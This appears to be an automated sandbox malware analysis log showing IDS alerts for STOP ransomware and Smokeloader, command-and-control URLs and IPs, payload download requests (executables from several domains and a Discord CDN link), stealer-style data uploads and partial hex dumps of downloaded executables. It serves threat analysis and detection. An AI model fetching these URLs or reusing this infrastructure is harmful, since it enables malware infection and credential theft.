Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 213.172.74.157:80 -> 192.168.2.4:49757
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 213.172.74.157:80 -> 192.168.2.4:49758
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49761 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49763 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49764 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49766 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49767 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49769 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49770 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49774 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49775 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49777 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49778 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49780 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49782 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49784 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49787 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49788 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49789 -> 91.92.253.69:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49797 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49802 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49805 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49810 -> 158.160.165.129:80
Source: C:\Windows\explorer.exe Network Connect: 189.163.126.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.174.152.66 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 193.233.132.167 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.92.253.69 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.154.13.143 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.185.16.114 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 158.160.165.129 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.196.109.209 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.159.134.233 443 Jump to behavior
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor URLs: http://cajgtus.com/test1/get.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 25 May 2024 19:29:34 GMTContent-Type: application/octet-streamContent-Length: 751104Last-Modified: Sat, 25 May 2024 19:20:05 GMTConnection: closeETag: "665239e5-b7600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c4 2a 01 d0 80 4b 6f 83 80 4b 6f 83 80 4b 6f 83 8d 19 b0 83 9a 4b 6f 83 8d 19 8f 83 f7 4b 6f 83 8d 19 8e 83 a7 4b 6f 83 89 33 fc 83 87 4b 6f 83 80 4b 6e 83 e8 4b 6f 83 35 d5 8e 83 81 4b 6f 83 8d 19 b4 83 81 4b 6f 83 35 d5 b1 83 81 4b 6f 83 52 69 63 68 80 4b 6f 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 25 39 28 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e4 00 00 00 5c 90 02 00 00 00 00 c7 43 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 91 02 00 04 00 00 45 4f 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 6a 01 00 50 00 00 00 00 80 90 02 68 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 6a 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 e3 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 48 72 00 00 00 00 01 00 00 74 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 ff 8e 02 00 80 01 00 00 46 09 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 d2 00 00 00 80 90 02 00 d4 00 00 00 a2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 25 May 2024 19:29:42 GMTContent-Type: application/octet-streamContent-Length: 232448Last-Modified: Wed, 22 May 2024 09:20:03 GMTConnection: closeETag: "664db8c3-38c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 14 2a 8b 75 75 44 d8 75 75 44 d8 75 75 44 d8 78 27 9b d8 6d 75 44 d8 78 27 a4 d8 03 75 44 d8 78 27 a5 d8 52 75 44 d8 7c 0d d7 d8 72 75 44 d8 75 75 45 d8 11 75 44 d8 c0 eb a1 d8 74 75 44 d8 78 27 9f d8 74 75 44 d8 c0 eb 9a d8 74 75 44 d8 52 69 63 68 75 75 44 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f f9 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 dc 00 00 00 18 88 02 00 00 00 00 7f 36 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 89 02 00 04 00 00 5c 36 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 50 01 00 50 00 00 00 00 90 88 02 28 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 51 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 46 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b3 da 00 00 00 10 00 00 00 dc 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 68 00 00 00 f0 00 00 00 6a 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 87 02 00 60 01 00 00 ca 01 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 77 00 00 00 90 88 02 00 78 00 00 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 May 2024 19:29:58 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 104.102.42.29 104.102.42.29
Source: Joe Sandbox View IP Address: 65.109.242.59 65.109.242.59
Source: Joe Sandbox View IP Address: 193.233.132.167 193.233.132.167
Source: Joe Sandbox View IP Address: 193.233.132.167 193.233.132.167
Source: Joe Sandbox View ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 6437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 104621Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kpyjjvqdiemoiebl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lelfqipvajp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jncoidythmtum.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecmpkonsxath.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhahtsyildlx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdvgvnpnsfha.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hexeftuymxc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vtxhrpouhnlhicef.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmovmgvridjjk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uopmqrlryhqym.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: trad-einmyus.com
